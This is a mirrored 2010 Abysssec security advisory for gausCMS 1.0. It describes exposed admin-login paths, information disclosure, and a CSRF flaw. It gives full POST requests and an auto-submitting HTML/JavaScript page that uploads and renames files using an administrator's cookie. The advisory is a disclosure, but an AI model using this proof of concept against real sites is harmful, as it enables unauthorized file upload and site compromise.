首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
gausCMS Multiple Vulnerabilities
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-23  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub-21-gauscms-multiple-vulnerabilities/

'''

Abysssec Inc Public Advisory
 
 
  Title            :  gausCMS Multiple Vulnerabilities
  Affected Version :  Gaus CMS version 1.0
  Discovery        :  www.abysssec.com
  Vendor    :  http://www.gaustudio.com/gausCMS.html
  Download Links   :  http://sourceforge.net/projects/gauscms/

 
Description :
===========================================================================================     
  This version of gausCMS have Multiple Valnerabilities :
        1- Access to Admin's Login and Information Disclosure
        2- CSRF Upload arbitrary file and rename file


Access to Admin's Section and Information Disclosure:
===========================================================================================    
  With this path you can easily access to Admin's Login:

        http://Example.com/admin_includes/template/languages/english/english.txt


  Vulnerable Code:
        http://Example.com/default.asp
  Ln 37:
        Set oFile = FSO.GetFile(PATHADMIN & "admin_includes/template/languages/" & GUILanguage & "/" & GUILanguage & ".txt")

 


CSRF Upload arbitrary file and rename file
===========================================================================================
   With send a POST request to this path, you can upload arbitrary file of course by Admin's cookie
   and by CSRF technique.

        http://Example.com/default.asp?dir=&toDo=uploadFile

 

   For example you can feed this POST Request to Admin :

 POST http://Example.com/default.asp?dir=&toDo=uploadFile HTTP/1.1
 Host: Example.com
 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 Keep-Alive: 300
 Proxy-Connection: keep-alive
 Referer: http://Example.com/default.asp?dir=&toDo=uploadFile
 Cookie: Skin=default; ASPSESSIONIDQSASTTBS=EIPNNJIAKDDEAGDKACICOBHJ
 Content-Type: multipart/form-data; boundary=---------------------------287032381131322
 Content-Length: 306

    Message Body:

 -----------------------------287032381131322
 Content-Disposition: form-data; name="attach1"; filename="Test.txt"
 Content-Type: text/plain

 123
 -----------------------------287032381131322
 Content-Disposition: form-data; name="toDo"

 Upload File
 -----------------------------287032381131322--

 

   ----------------------------------------------------------------------------------

   With the same method we can rename files with following path:

        http://Example.com/default.asp?dir=&file=Test2.txt&toDo=Rename%20File

   For example you can feed this POST Request to Admin:

 POST http://Example.com/default.asp?dir=&file=Test.txt&toDo=Rename%20File HTTP/1.1
 Host: Example.com
 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 Keep-Alive: 300
 Proxy-Connection: keep-alive
 Referer: http://Example.com/default.asp?dir=&file=Test2.txt&toDo=rename
 Cookie: Skin=default; ASPSESSIONIDQSASTTBS=IIPNNJIANIKOIKGOGOIKAJGE
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 39

    Message Body:

 newFileName=Test2.txt&toDo=Rename+File

 
    

The Source of HTML Page (Malicious Link) for Upload Arbitrary file
===========================================================================================    
  With this page, we send a POST request with AJAX to upload a file with Admin's Cookie.
 

<html>
<head>
<title >Wellcome to gausCMS!</title>
Hello!
...
...
...
This page uploads a file

<script>
   
    var binary;
    var filename;      
   
    function FileUpload() {                
        try {
            netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
        } catch (e) {
        }

        var http = false;       
        if (window.XMLHttpRequest) {                              
            http = new XMLHttpRequest();           
        }
        else if (window.ActiveXObject) {       
            http = new ActiveXObject("Microsoft.XMLHTTP");
        }

        var url = "http://Example.com/default.asp?dir=&toDo=uploadFile";
        var filename = 'Test.txt';
        var filetext = ' 123 ';

        var boundaryString = '---------------------------287032381131322';
        var boundary = '--' + boundaryString;
        var requestbody = boundary + '\n'
     + 'Content-Disposition: form-data; name="attach1"; filename="'
     + filename + '"' + '\n'
            + 'Content-Type: text/plain' + '\n'
     + '\n'
     + filetext         
     + '\n'           
            + boundaryString
            + 'Content-Disposition: form-data; name="toDo"'
            +'Upload File'
            + '\n'
     + boundary;
       
        http.onreadystatechange = done;
        http.open('POST', url, true);
       
        http.setRequestHeader("Content-type", "multipart/form-data; boundary=" + boundaryString);       
        http.setRequestHeader("Connection", "close");
        http.setRequestHeader("Content-length", requestbody.length);
        http.send(requestbody);
        }
        function done() {
            if (http.readyState == 4 && http.status == 200) {
                //alert(http.responseText);
                //alert('Upload OK');
            }           
        }            
</script>
</head>
<body onload ="FileUpload();">
</body>
</html>


===========================================================================================
 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ubuntu Linux 'mountall' Local
·Adobe Shockwave Director tSAC
·Novell iPrint Client ActiveX C
·Skybluecanvas.v1.1-r248 CSRF v
·Novell iPrint Client ActiveX C
·MP3 Workstation Version 9.2.1.
·Softek Barcode Reader Toolkit
·mobile ringtone audio converte
·Acoustica Audio Converter Pro
·VideoCharge Studio DLL Hijacki
·Personal.Net Portal Multiple V
·SEasyOfficeRecovery DLL Hijack
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved